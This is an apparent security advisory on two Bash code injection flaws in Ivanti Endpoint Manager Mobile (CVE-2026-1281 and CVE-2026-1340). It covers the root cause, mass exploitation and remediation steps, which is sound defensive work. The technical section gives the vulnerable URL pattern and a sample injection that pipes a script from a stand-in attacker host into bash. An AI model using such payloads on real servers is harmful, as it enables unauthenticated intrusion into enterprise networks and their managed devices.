CVE-2026-1281

What is Ivanti Endpoint Manager Mobile (EPMM)?

Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron, is an enterprise Mobile Device Management (MDM) platform deployed by organizations to centrally manage and secure smartphones, tablets, and other mobile devices across their workforce. It is widely used in government agencies, healthcare organizations, and enterprises to enforce mobile security policies.

Key functions include:

• Device enrollment and lifecycle management — provision, configure, and retire corporate and BYOD mobile devices
• Policy enforcement — push security policies (encryption, screen lock, app restrictions) to enrolled devices
• Application management — distribute, update, and remotely wipe enterprise applications from a central console
• VPN and network access — configure and distribute VPN profiles and certificates to managed endpoints
• Compliance monitoring — continuously assess enrolled device posture and flag non-compliant devices

EPMM is typically deployed as an on-premises appliance with its management interface exposed to the internet for device check-ins — which dramatically increases its attack surface. As an MDM server, a compromised EPMM instance can push malicious profiles, certificates, and applications to every enrolled device, making it an exceptionally high-value pivot point for enterprise network intrusion.

Overview

Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability (CWE-94) in its In-House Application Distribution feature that allows an unauthenticated remote attacker to achieve arbitrary command execution on the appliance. The companion vulnerability CVE-2026-1340 (also CVSS 9.8) affects the Android File Transfer (AFT) configuration feature via the same class of flaw in a different endpoint.

Both were exploited as zero-days before Ivanti's January 29, 2026 disclosure. Exploitation continued at mass scale through at least March 2026, with threat actors deploying webshells, establishing reverse shells, and staging data for exfiltration. The German BSI issued a national warning, and CERT-EU published a critical advisory.

Affected Versions

Temporary fix: Ivanti released out-of-band RPM patches on January 29, 2026. Apply either the .0.x or .1.x RPM for your installed version — only one RPM is required and no service downtime is necessary. The RPM patches replace the vulnerable Bash scripts with compiled Java classes (AppStoreUrlMapper.java and AFTUrlMapper.java).

Permanent fix: Upgrade to EPMM 12.8.0.0, released Q1 2026. Once on 12.8, no RPM patches need to be maintained.

Technical Details

Both CVE-2026-1281 and CVE-2026-1340 are Bash code injection vulnerabilities rooted in the same design pattern: EPMM routes certain HTTP requests through shell scripts that construct and evaluate Bash commands using unsanitized URL parameters.

CVE-2026-1281 — App Store URL injection:

Requests to the pattern /mifs/c/appstore/fob/3/<int>/sha256:<payload>/<filename>.ipa are handled by the Bash script /mi/bin/map-appstore-url. This script extracts fields from the URL path and uses them inside a Bash arithmetic expansion ($(( ... ))). An attacker can embed a command substitution expression (e.g., `id` or $(curl attacker.com/shell.sh|bash)) in the URL, which Bash then executes when evaluating the arithmetic expression.

CVE-2026-1340 — AFT URL injection:

The same flaw pattern exists in /mi/bin/map-aft-store-url, which handles Android File Transfer configuration requests. Exploitation is structurally identical.

Attack characteristics:

• No credentials, session, or prior access required
• Exploitable over the internet against any EPMM instance with a reachable management interface
• Single HTTP GET request sufficient to achieve unauthenticated RCE as the EPMM service user
• Public PoC available since January 30, 2026

CWE-94 (Improper Control of Generation of Code): The application passes attacker-controlled string data into a context that evaluates it as executable code (Bash arithmetic expansion), without neutralizing special characters that alter code semantics.

Discovery

The vulnerabilities were reported to Ivanti and confirmed as actively exploited zero-days prior to the January 29, 2026 public disclosure. watchTowr Labs published the first detailed public technical analysis and proof-of-concept on January 30, 2026. Horizon3.ai independently published exploit research and root-cause analysis shortly after.

This continues a pattern of sustained researcher attention on Ivanti EPMM: Ivanti's MDM platform has been exploited in multiple high-profile zero-day campaigns, including nation-state actors targeting government customers in prior years.

Exploitation Context

Exploitation was confirmed before Ivanti's public disclosure. Key indicators of the scope:

• Exposure: Shadowserver Foundation identified approximately 1,600 internet-exposed EPMM instances globally at time of disclosure; Palo Alto Networks Cortex Xpanse telemetry placed the figure above 4,400 instances.
• Initial exploitation spike: Shadowserver observed exploitation attempts from at least 13 distinct source IPs within 24 hours of the PoC publication.
• Mass exploitation wave: By March 2026, Telekom Security documented a sustained mass exploitation campaign. Post-exploitation activity included:
  • Webshell deployment (files named 401.jsp / 403.jsp)
  • Reverse shell establishment over TCP/443
  • Secondary payload retrieval via curl / wget
  • Database export and data staging
  • Cleanup commands and anti-forensic behavior
• Sectors targeted: Confirmed victims reported by Palo Alto Unit 42 span state and local government, healthcare, manufacturing, professional and legal services, and high technology — across the United States, Germany, Australia, and Canada.
• GreyNoise intelligence: Traced a significant portion of active exploitation traffic to a single bulletproof hosting IP, suggesting coordinated threat actor infrastructure rather than purely opportunistic scanning.
• Chaining risk: Both CVE-2026-1281 and CVE-2026-1340 can be exploited independently or in sequence; chaining both provides redundant RCE paths even if one endpoint is partially mitigated.
• Government warnings: The German Federal Office for Information Security (BSI) issued a national-level warning; CERT-EU published advisory 2026-001.

Remediation

1. Apply the RPM patch immediately — install the RPM for your EPMM version branch (12.5.x, 12.6.x, or 12.7.x) from the Ivanti support portal; no downtime is required
2. Plan upgrade to EPMM 12.8.0.0 — the RPM is a temporary mitigation; only the full version upgrade eliminates the vulnerable code path permanently
3. Restrict internet access to the EPMM management interface — EPMM should not be directly reachable from the public internet; place it behind a VPN gateway or restrict by allowlisted IP ranges using firewall ACLs
4. Hunt for compromise indicators — search web server logs for requests matching /mifs/c/appstore/fob/ and /mifs/c/appstore/aft/ containing backtick or $() sequences; check for unexpected .jsp files in the EPMM web root (especially 401.jsp, 403.jsp)
5. Review outbound connections — look for unexpected curl/wget calls, reverse shell connections (outbound TCP/443 to non-Ivanti infrastructure), and unusual process trees spawned by the EPMM service account
6. Check enrolled device integrity — if EPMM was compromised, any profile, certificate, or application pushed to enrolled devices after the compromise window should be treated as potentially malicious
7. Discontinue use if patching and network isolation cannot be achieved promptly; EPMM compromise gives attackers control over all enrolled mobile endpoints